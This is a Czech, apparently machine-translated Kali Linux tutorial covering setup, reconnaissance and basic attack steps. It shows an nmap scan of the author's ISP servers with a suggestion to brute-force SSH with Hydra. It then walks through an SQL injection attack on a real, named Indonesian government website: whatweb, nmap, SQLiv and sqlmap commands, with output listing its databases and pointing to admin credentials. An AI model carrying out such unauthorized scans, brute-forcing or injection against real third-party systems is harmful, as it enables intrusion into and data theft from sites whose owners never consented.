Kali Linux Tutorial

Kali Linux Tutorial



Pokud jste odborníkem nebo alespoň znáte Linux, příkazy a prostředí, právě jste si na svůj počítač nainstalovali Kali Linux, chtěli jste se stát Master of Kali Linux nebo Ethical Hacker, jste na správném místě. V tomto článku se budu zabývat výukovým programem Kali Linux pro uživatele Linuxu, kteří již s Kali nejsou obeznámeni, a seznámíte se se základními technikami používanými pro hackování a testování zabezpečení při používání Kali.

Co je Kali Linux?

Kali Linux, ( poprvé vydáno 13. března 2013 ), která byla formálně známá jako BackTrack, vyvinutá bezpečnostní firmou Offensive Security, je forenzní a na bezpečnost zaměřená distribuce založená na testovací větvi Debianu. Kali Linux je navržen s ohledem na penetrační testování, obnovu dat a detekci hrozeb. Projekt přešel na model postupného vydání počátkem tohoto roku ve snaze poskytnout uživatelům distribuce aktuálnější bezpečnostní nástroje. Kali Linux je zdarma a vždy bude. Obsahuje 600+ nástrojů pro penetrační testování.







Proč Kali Linux? Je to pro tebe to pravé?

Kali Linux si v poslední době získal velkou popularitu. A je za tím důvod. Hacking je zpět jako skvělá věc v populární kultuře, což lze významně přičíst televiznímu seriálu Mr. Robot. Popularita pana Robota pomohla Kali Linuxu získat nové uživatele. Lidé s téměř žádnou znalostí Linuxu nebo čehokoli souvisejícího s počítačovou bezpečností se nyní pokoušejí používat Kali jako svou hlavní distribuci Linuxu.



Naše dosud nejpokročilejší distribuce testování penetrace. - Vývojáři Kali Linuxu. (Je to napsáno na hlavní stránce Kali.org v horní části stránky.) Co z toho prohlášení získáte? Všimli jste si toho: APTD (Advanced Penetration Testing Distribution)? Doslova zde neexistuje termín hacking. Kali Linux je stejný jako ostatní distribuce Linuxu. Jednoduše řečeno, je to distribuce Linuxu plná nástrojů souvisejících se zabezpečením a zaměřená na odborníky na zabezpečení sítě a počítače. Používání systému Kali Linux se však zaměřuje pouze na zabezpečení a forenzní služby.



Distribuce Linuxu není nic jiného než balíček obsahující jádro Linuxu, sadu základních nástrojů a aplikací a některá výchozí nastavení. Kali Linux tedy nenabízí něco jedinečného v tom smyslu, že většinu poskytovaných nástrojů lze nainstalovat do jakékoli distribuce Linuxu.





Kali Linux je speciálně přizpůsoben tak, aby splňoval požadavky profesionálního penetračního testování a bezpečnostního auditu. Je zaměřen na konkrétní podmnožinu uživatelů Linuxu. Pentestery, hackeři atd. Není to doporučená distribuce, pokud očekáváte Kali pro obecné desktopy Linux pro vývoj, web design, hraní her, kancelář atd. Kali vám může přinést určité výzvy, i když jste zkušený uživatel Linuxu .

Věci, které je třeba udělat po instalaci KALI LINUX

Po instalaci Kali Linuxu si možná říkáte, co s tím dál, že? Každý čelí tomuto problému, nebojte se.



KROK 1: NASTAVENÍ REPOZITORU

Za prvé to možná už víte, ale je důležité správně nastavit úložiště. Jak jsem řekl, model postupného vydání systému Kali Linux je snahou poskytnout uživatelům distribuce aktuálnější bezpečnostní nástroje. Obecně platí, že pokud máte nově nainstalovaný Kali Linux, úložiště odkazuje na médium, které používáte k instalaci. Chcete -li to opravit, musíte změnit úložiště na oficiální úložiště Kali Linux. Požadovaný soubor je umístěn pod /etc/apt/sources.list . Otevřete soubor pomocí textového editoru Leafpad a nahraďte výchozí úložiště do tohoto oficiálního úložiště Kali Rolling:

deb http://http.kali.org/kali kali-rolling main contrib non-free # For source package access, uncomment the following line # deb-src http://http.kali.org/kali kali-rolling main contrib non-free 

KROK 2: AKTUALIZUJTE A UPGRADUJTE SVŮJ KALI LINUX

Po aktualizaci a upgradu systému synchronizujte Kali Linux s nejnovější verzí. Chcete -li to provést, otevřete terminál a zadejte:

apt update -y && apt upgrade -y && apt dist-upgrade 

Příkaz apt update stáhne a načte informace o balíčcích z úložišť a aktualizuje je, aby získal informace o nejnovějších verzích balíků a jejich závislostech.

Příkaz apt upgrade stáhne a nainstaluje novější verzi balíčků nainstalovaných balíčků Kali Linux, pokud neobsahuje chyby závislostí.

Apt dist-upgrade aktualizuje všechny balíčky na nejnovější dostupnou verzi bez ohledu na to. A také podle potřeby nainstalujte a odeberte závislosti (nainstalujte závislosti k uspokojení balíčků, samozřejmě, ale také odeberte závislosti, které osiřely, pokud aktualizovaný balíček již nepotřeboval závislost.

ZÁKLADNÍ KONCEPCE TESTOVÁNÍ PENETRACE S KALI LINUX

Poté, co jste úspěšně provedli tyto kroky, existují tři hlavní věci, které můžete s Kali Linuxem dělat na základě cíleného systému, včetně:

  1. Hackování v bezdrátové síti - Wifi hacking, Phising, ARP Otrava atd.
  2. Hackování webových aplikací -SQL Injection, Cross-Site Request Forgery (CSRF), Web Phising atd.
  3. Hackování zařízení - Využijte cílový stroj a získejte nad ním kontrolu.

Nezahrnuji hackování IoT, to neznamená, že Kali Linux pro tento účel nemá žádnou schopnost. Ale doslova to může patřit také hackování zařízení. Protože zařízení má fyzický vzhled a formu. V tomto tutoriálu jsem pokryl jejich základní znalosti. Protože je Kali Linux obrovský, nevejde se do jednoho článku!

Také potřebujete vědět, cyklus nebo postup testování penetrace. Oni jsou:

  1. Reconnaissance - Shromažďování informací
  2. Snímání
  3. Úkon
  4. Post-exploatace

BEZDRÁTOVÁ SÍŤOVÉ HACKOVÁNÍ S KALI LINUX

Pokud jde o hackování bezdrátových sítí, oběť se může lišit. Protože bezdrátové sítě se skládají z několika věcí, jako je ISP (Internet Service Provider), router a jeho spojenci (modem, rozbočovač, přepínač atd.) A klienti (uživatelé, CCTV, vzdálený počítač atd.). Mají také zranitelné možnosti.

Internet je rozsáhlá a komplexní agregace síťového hardwaru propojená branami. Sledování trasy, kterou vaše pakety sledují, je důležité vědět, jak dosáhnete určitého názvu hostitele nebo cílové adresy IP.

Kali Linux má vestavěný nástroj s názvem Traceroute. Traceroute využívá čas protokolu IP na živé pole a pokouší se vyvolat odpověď ICMP TIME_EXCEEDED z každé brány podél cesty k nějakému hostiteli. Traceroute se pokouší vysledovat trasu, kterou by IP paket sledoval k nějakému internetovému hostiteli, spuštěním testovacích paketů s malým TTL (time to live) a následným nasloucháním ICMP přesahujícím odpověď z brány. Dám vám a příklad, jak vysledovat router ISP používaný ke zpracování našeho připojení pomocí Traceroute.

1. Uznání

Shromažďování informací je nejdůležitějším skokovým začátkem, tento krok si nenechte ujít. V tomto kroku je naším cílem získat co nejvíce užitečných informací, které bychom mohli získat, a poté jsou tyto informace použity pro další kroky.

Nejprve otevřete terminál a zadáním tohoto příkazu zahájíte trasování silnice na web, v tomto případě jsem web nastavil na google.com.

traceroute google.com 

Snímek obrazovky Traceroute

2. Skenování

Jakmile spustíme příkazy, zobrazí se seznam, kam náš paket jde postupně. Jak vidíte výše, dostal jsem 3 hopy, z nichž jeden je můj ISP server. První IP na seznamu je můj router, který funguje jako brána. A další dva z nich patří mému ISP. Nyní se podívejme na službu, kterou provozují, pomocí Nmap. Cíle, které budeme skenovat, tedy jsou 10.152.192.1 a 10.13.223.102 . V terminálu jsem spustil následující příkaz:

nmap -v -sS [IP Target] -Pn 

Pojďme rozebrat argument příkazu:

-v = Povolit režim výřečnosti

-sS = Použijte skenovací techniku ​​TCP SYN

-Pn = Zacházet se všemi hostiteli jako s online -přeskočit vyhledávání hostitelů

A tady je výsledek, kterého jsme dosáhli.

snímek obrazovky nmap 2

Bohužel jsou zapnuty všechny porty 10.152.192.1 jsou filtrovány, to znamená, že všechna příchozí připojení TCP jsou na této IP blokována IDS nebo Firewallem. Pojďme tedy provést další skenování k druhému cíli.

snímek obrazovky nmap 1

3. Provoz

V tomto postupu nemám v úmyslu provádět skutečné vykořisťování, místo toho vám ukážu, jak. Na základě výše uvedeného výsledku skenování Nmap víme, že tato IP má server SSH spuštěný na portu 22 a je otevřený. Je otevřený k bruteforce, haha! Našli jsme díru, tento server SSH je možná díra, do které bychom se mohli pokusit získat přístup. V systému Kali Linux existuje několik nástrojů, které podporují útoky bruteforce nebo slovníku proti protokolu SSH. Nejoblíbenější a nejsilnější je Hydra.

Dobře, to byl základní postup provádění penetračního testu proti cílenému serveru, což je v našem případě můj server ISP.

WEBOVÉ APLIKACE HACKING S KALI LINUX

Pokud vás to vášnivě baví, můžete si hackerské prostředí nastavit instalací DWVA (Damn Vulnerable Web App) do svého Kali Linuxu. Jedná se o webovou aplikaci PHP/MySQL, která má spoustu zranitelných děr. Jejími hlavními cíli je být pomůckou pro bezpečnostní profesionály k otestování jejich dovedností a nástrojů v právním prostředí a pomoci webovým vývojářům lépe porozumět procesům zabezpečení webových aplikací. DWVA můžete zdarma získat na Githubu zde: https://github.com/ethicalhack3r/DVWA.

Prozatím vám ukážu, jak provádět hackování webových aplikací na skutečném webu. Ale slib mi, že je to omezeno pouze na vzdělávací účely. Budeme simulovat skutečný útok na skutečném webu pomocí injekce SQL.

Předpoklad

Pokryté nástroje:

-Whatweb (předinstalovaný)

-Nmap (předinstalovaný)

- SQLiv (instalace ručně)

-SQLMap (předinstalovaný)

Potřebujeme ještě jeden další nástroj, který je k dispozici na Github zde: https://github.com/Hadesy2k/sqliv, nainstalujte jej nejprve do našeho Kali Linuxu. Tento nástroj s názvem SQLiv, který je schopen provádět cílené skenování poskytnutím konkrétní domény (s procházením). Zadejte terminál:

git clone https://github.com/Hadesy2k/sqliv.git cd sqliv && sudo python2 setup.py -i 

Cíl: www.trenggalekkab.go.id

1. Uznání

Shromážděte tolik užitečných informací, kolik bychom mohli získat. Mohli bychom otevřít webovou stránku a zjistit, jaká aplikace na tomto webu běží. Nejprve se podívejme, o jaký web se jedná. Použijeme k tomu whatweb.

whatweb www.trenggalekkab.go.id 

Jaký webový snímek obrazovky

Jak vidíte výše, cíl se nachází v Indonésii. Běží to Apache v2.2.27 na svém webovém serveru a také má PHP v5.4.31 , má IP adresu 103,247,21.142 . Dobře, poznamenejte si to. Možná budete muset navštívit jeho webovou stránku a hledat vytvořený soubor nebo stránku, parametry adresy URL nebo dokonce přihlašovací formulář. Prozatím potřebujeme tuto IP adresu pro další krok, který je skenování.

2. Skenování

Stejně jako dříve znovu použijeme Nmap ke skenování, jaké porty a služby běží na cíli.

nmap -v -sS 103.247.21.142 

A tady je výsledek, který jsme dostali:

Completed SYN Stealth Scan at 21:22, 261.93s elapsed (1000 total ports) Nmap scan report for ip-103-247-21-142.wifian.net.id (103.247.21.142) Host is up (0.069s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 212/tcp open anet 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3128/tcp filtered squid-http  3306/tcp open mysql  

Existuje spousta otevřených portů, které zpracovávají každou službu na cíli, ale ten, který vypadá poutavě, je služba mysql na portu 3306. Je uvedeno, že tato stránka používá mysql spravovat jejich informace v databázích. Pak by mě zajímalo, jestli na tomto webu nejsou nějaké chyby zabezpečení týkající se SQL Injection. Takže znovu skenuji web pomocí SQLiv, který jsme právě nainstalovali. Napsal jsem příkaz:

sqliv -t www.trenggalekkab.go.id 

SQLHacking ScreenShot1

Na tomto webu jsme našli 2 možné adresy URL citlivé na SQL. Poznamenejte si tyto adresy URL.

3. Provoz

Dobře, máme zranitelné adresy URL SQL a jsme připraveni ke spuštění. K tomu použijeme SQLMap. Syntaxe je:

sqlmap [Vulnerable URL] --dbs 

Příkaz by měl vypadat takto:

 sqlmap -u "http://www.trenggalekkab.go.id/berita.php?page=208" --dbs 

Argument –dbs je říct SQLMapu, aby získal cílové databáze. Zde je výstup, který jsme získali:

[INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.31, Apache 2.2.27 back-end DBMS: MySQL 5 [21:46:04] [INFO] fetching database names [21:46:04] [INFO] the SQL query used returns 2 entries [21:46:04] [INFO] resumed: information_schema [21:46:04] [INFO] resumed: trengkab_trg available databases [2]: [*] information_schema [*] trengkab_trg 

SQLMap našel 2 databáze, ale pouze jednu z nich, která obsahuje citlivá data, jako je účet pověření správce. To je na trengkab_trg. Poté, co jsme našli databáze, je tu ještě další krok, který bychom měli udělat. To je najít tabulky a sloupce a posledním krokem je vypsání dat. V této sekci vám pomocí tohoto cíle neukážu, jak na to. Alespoň znáte základní myšlenku cyklu útoku a používání některých nástrojů.

HACKOVÁNÍ ZAŘÍZENÍ

V budoucím článku na tomto webu se budeme zabývat hackováním zařízení, zůstaňte s námi. Jako předběžné varování se budete chtít ujistit, že znáte nějaký Python.